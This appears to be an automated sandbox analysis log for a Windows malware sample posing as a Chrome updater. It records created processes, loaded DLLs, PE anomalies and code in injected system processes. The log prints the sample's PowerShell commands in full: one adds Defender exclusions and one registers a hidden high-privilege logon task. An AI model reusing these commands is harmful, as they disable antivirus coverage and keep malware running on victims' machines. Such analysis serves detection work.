                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: ylVAEHbMLf.exeStatic PE information: Image base 0x140000000 > 0x60000000
                Source: ylVAEHbMLf.exeStatic file information: File size 5980672 > 1048576
                Source: ylVAEHbMLf.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x592e00
                Source: ylVAEHbMLf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
                Source: C:\Users\user\Desktop\ylVAEHbMLf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }Jump to behavior
                Source: updater.exe.0.drStatic PE information: real checksum: 0x5b59b2 should be: 0x5bad0c
                Source: ylVAEHbMLf.exeStatic PE information: real checksum: 0x5b59b2 should be: 0x5bad0c
                Source: yfiogronfirx.tmp.0.drStatic PE information: real checksum: 0x25e65 should be: 0x2b1bf
                Source: ylVAEHbMLf.exeStatic PE information: section name: .xdata
                Source: updater.exe.0.drStatic PE information: section name: .xdata
                Source: yfiogronfirx.tmp.0.drStatic PE information: section name: .xdata
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B6DD2A5 pushad ; iretd 5_2_00007FFD9B6DD2A6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD9B7F000C pushad ; iretd 5_2_00007FFD9B7F00C1
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC6222B8 push rdx; retf 7_2_00000225DC6222B9
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC6284FD push rcx; retf 003Fh7_2_00000225DC6284FE
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC6594FD push rcx; retf 003Fh7_2_00000225DC6594FE
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC6822B8 push rdx; retf 7_2_00000225DC6822B9
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC6884FD push rcx; retf 003Fh7_2_00000225DC6884FE
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC6B94FD push rcx; retf 003Fh7_2_00000225DC6B94FE
                Source: C:\Windows\System32\lsass.exeCode function: 8_2_00000202C0AC22B8 push rdx; retf 8_2_00000202C0AC22B9
                Source: C:\Windows\System32\lsass.exeCode function: 8_2_00000202C0AC84FD push rcx; retf 003Fh8_2_00000202C0AC84FE
                Source: C:\Windows\System32\lsass.exeCode function: 8_2_00000202C0AF94FD push rcx; retf 003Fh8_2_00000202C0AF94FE
                Source: C:\Windows\System32\svchost.exeCode function: 9_2_000002A6612E22B8 push rdx; retf 9_2_000002A6612E22B9
                Source: C:\Windows\System32\svchost.exeCode function: 9_2_000002A6612E84FD push rcx; retf 003Fh9_2_000002A6612E84FE
                Source: C:\Windows\System32\svchost.exeCode function: 9_2_000002A6613194FD push rcx; retf 003Fh9_2_000002A6613194FE
